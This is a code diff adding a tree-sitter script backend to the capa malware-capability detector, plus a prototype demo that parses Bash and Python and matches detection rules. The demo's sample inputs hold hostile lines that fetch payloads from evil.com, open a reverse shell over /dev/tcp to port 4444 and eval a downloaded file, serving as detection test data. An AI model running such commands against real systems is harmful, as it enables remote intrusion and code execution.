logging.getLogger("capa") @@ -239,6 +241,8 @@ def get_format_from_extension(sample: Path) -> str: format_ = FORMAT_BINEXPORT2 elif sample.name.endswith(EXTENSIONS_BINJA_DB): format_ = FORMAT_BINJA_DB + elif sample.name.endswith(EXTENSIONS_SCRIPT): + format_ = FORMAT_SCRIPT return format_ diff --git a/capa/loader.py b/capa/loader.py index 939680ab7d..bc78719d34 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -42,6 +42,7 @@ FORMAT_SC64, FORMAT_VMRAY, FORMAT_DOTNET, + FORMAT_SCRIPT, FORMAT_DRAKVUF, FORMAT_BINJA_DB, FORMAT_BINEXPORT2, @@ -68,6 +69,7 @@ BACKEND_BINEXPORT2 = "binexport2" BACKEND_IDA = "ida" BACKEND_GHIDRA = "ghidra" +BACKEND_SCRIPT = "script" class CorruptFile(ValueError): @@ -482,6 +484,12 @@ def __exit__(self, exc_type, exc_val, exc_tb): import capa.features.extractors.ghidra.extractor return capa.features.extractors.ghidra.extractor.GhidraFeatureExtractor(ctx_manager=cm, tmpdir=tmpdir) + + elif backend == BACKEND_SCRIPT: + import capa.features.extractors.script.extractor + + return capa.features.extractors.script.extractor.ScriptFeatureExtractor(input_path) + else: raise ValueError("unexpected backend: " + backend) @@ -553,6 +561,11 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) + elif input_format == FORMAT_SCRIPT: + import capa.features.extractors.script.extractor + + file_extractors.append(capa.features.extractors.script.extractor.ScriptFeatureExtractor(input_file)) + return file_extractors diff --git a/capa/main.py b/capa/main.py index 368d3ecd15..71d6b71534 100644 --- a/capa/main.py +++ b/capa/main.py @@ -57,6 +57,7 @@ BACKEND_FREEZE, BACKEND_GHIDRA, BACKEND_PEFILE, + BACKEND_SCRIPT, BACKEND_DRAKVUF, BACKEND_BINEXPORT2, ) @@ -98,6 +99,7 @@ STATIC_FORMATS, DYNAMIC_FORMATS, FORMAT_BINJA_DB, + FORMAT_SCRIPT, FORMAT_BINEXPORT2, ) from capa.capabilities.common import ( @@ -279,6 +281,7 @@ def install_common_args(parser, wanted=None): (FORMAT_FREEZE, "features previously frozen by capa"), (FORMAT_BINEXPORT2, "BinExport2"), (FORMAT_BINJA_DB, "Binary Ninja Database"), + (FORMAT_SCRIPT, "Script file (Python, etc.)"), ] format_help = ", ".join([f"{f[0]}: {f[1]}" for f in formats]) @@ -304,6 +307,7 @@ def install_common_args(parser, wanted=None): (BACKEND_CAPE, "CAPE"), (BACKEND_DRAKVUF, "DRAKVUF"), (BACKEND_VMRAY, "VMRay"), + (BACKEND_SCRIPT, "Script (tree-sitter)"), ] backend_help = ", ".join([f"{f[0]}: {f[1]}" for f in backends]) parser.add_argument( @@ -600,6 +604,9 @@ def get_backend_from_cli(args, input_format: str) -> str: elif input_format == FORMAT_BINEXPORT2: return BACKEND_BINEXPORT2 + elif input_format == FORMAT_SCRIPT: + return BACKEND_SCRIPT + else: return BACKEND_VIV diff --git a/pyproject.toml b/pyproject.toml index 204910dda7..2af79c0f59 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -181,6 +181,10 @@ scripts = [ ghidra = [ "pyghidra>=3.0.0", ] +script = [ + "tree-sitter>=0.24", + "tree-sitter-python>=0.23", +] [tool.deptry] extend_exclude = [ diff --git a/treesitter_demo.py b/treesitter_demo.py new file mode 100644 index 0000000000..9e897d0c59 --- /dev/null +++ b/treesitter_demo.py @@ -0,0 +1,129 @@ +"""Tree-sitter capa backend prototype — Bash + Python feature extraction with rule matching.""" + +from dataclasses import dataclass +from typing import Iterator +import tree_sitter_bash as tsbash +import tree_sitter_python as tspython +from tree_sitter import Language, Parser, Node + +# --- Feature types (mirrors capa.features.insn / capa.features.common) --- + +@dataclass(frozen=True) +class API: + value: str + +@dataclass(frozen=True) +class String: + value: str + +@dataclass(frozen=True) +class Number: + value: int + +@dataclass(frozen=True) +class Characteristic: + value: str + +# --- Address type (like AbsoluteVirtualAddress, but line:col) --- + +@dataclass(frozen=True) +class ScriptAddress: + line: int + col: int + @classmethod + def from_node(cls, n: Node): return cls(n.start_point[0] + 1, n.start_point[1]) + def __repr__(self): return f"L{self.line}:{self.col}" + +# --- Bash instruction handlers (like viv/insn.py INSTRUCTION_HANDLERS) --- + +def bash_api(node): + if node.type == "command": + name = node.child_by_field_name("name") + if name: yield API(name.text.decode()) + +def bash_string(node): + if node.type in ("string", "raw_string"): + t = node.text.decode().strip('"').strip("'") + if len(t) >= 4: yield String(t) + +def bash_number(node): + if node.type == "number": + try: yield Number(int(node.text.decode())) + except ValueError: pass + +def bash_char(node): + if node.type == "pipeline": yield Characteristic("pipe") + if node.type == "redirected_statement": yield Characteristic("redirect") + +# --- Python instruction handlers --- + +def python_api(node): + if node.type == "call": + func = node.child_by_field_name("function") + if func: yield API(func.text.decode()) + +def python_string(node): + if node.type == "string": + t = node.text.decode().strip('"').strip("'") + if len(t) >= 4: yield String(t) + +def python_number(node): + if node.type == "integer": + try: yield Number(int(node.text.decode(), 0)) + except ValueError: pass + +def python_char(node): + if node.type == "call": + func = node.child_by_field_name("function") + if func and func.text.decode() in ("eval", "exec"): + yield Characteristic("dynamic execution") + +HANDLERS = { + "bash": [bash_api, bash_string, bash_number, bash_char], + "python": [python_api, python_string, python_number, python_char], +} + +# --- Feature extractor (mirrors StaticFeatureExtractor) --- + +def walk(node): + yield node + for c in node.children: yield from walk(c) + +def extract(source: bytes, lang: str) -> dict: + parser = Parser(Language({"bash": tsbash, "python": tspython}[lang].language())) + tree = parser.parse(source) + features = {} + for node in walk(tree.root_node): + addr = ScriptAddress.from_node(node) + for handler in HANDLERS[lang]: + for feat in handler(node): + features.setdefault(feat, set()).add(addr) + return features + +# --- Rule matching (simplified capa engine) --- + +def match_rules(features): + rules = [ + ("download file via curl/wget", "or", [API("curl"), API("wget")]), + ("create reverse shell", "and", [API("bash"), Number(4444)]), + ("execute shell command (Python)", "or", [API("os.system"), API("subprocess.call")]), + ("dynamic code execution", "or", [Characteristic("dynamic execution")]), + ] + for name, logic, conditions in rules: + hits = [c in features for c in conditions] + if (logic == "and" and all(hits)) or (logic == "or" and any(hits)): + print(f" ✅ {name}") + +# --- Run --- + +if __name__ == "__main__": + for lang, src in [ + ("bash", b'#!/bin/bash\ncurl -o /tmp/payload "http://evil.com/mal"\nPORT=4444\nbash -i >& /dev/tcp/10.0.0.1/$PORT 0>&1'), + ("python", b'import os, subprocess\nos.system("wget http://evil.com/bd")\neval(open("/tmp/bd").read())'), + ]: + print(f"\n{'='*50}\n {lang.upper()} script\n{'='*50}") + feats = extract(src, lang) + for feat, addrs in sorted(feats.items(), key=lambda x: min(a.line for a in x[1])): + print(f" {min(addrs)} → {type(feat).__name__}({feat.value!r})") + print(f"\n Rules matched:") + match_rules(feats)